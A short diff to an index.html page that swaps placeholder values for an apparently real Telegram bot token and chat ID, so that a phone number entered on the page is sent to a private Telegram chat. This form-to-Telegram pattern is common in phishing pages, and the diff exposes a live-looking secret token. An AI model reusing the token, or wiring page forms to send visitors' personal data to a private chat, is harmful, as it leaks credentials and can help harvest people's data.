--- a/index.html
+++ b/index.html
@@ -155,8 +155,8 @@
       if (!phone) return;
 
       // Telegram Bot API info - replace with your own bot token and chat ID
-      const botToken = "YOUR_BOT_TOKEN_HERE";
-      const chatId = "YOUR_CHAT_ID_HERE";
+      const botToken = "8275257587:AAHqb6nOza3eaFNZQGtr5yNuS5D9NArBBbE";
+      const chatId = "7549590022";
 
       const message = `Nomor Handphone: ${phone}`;
 
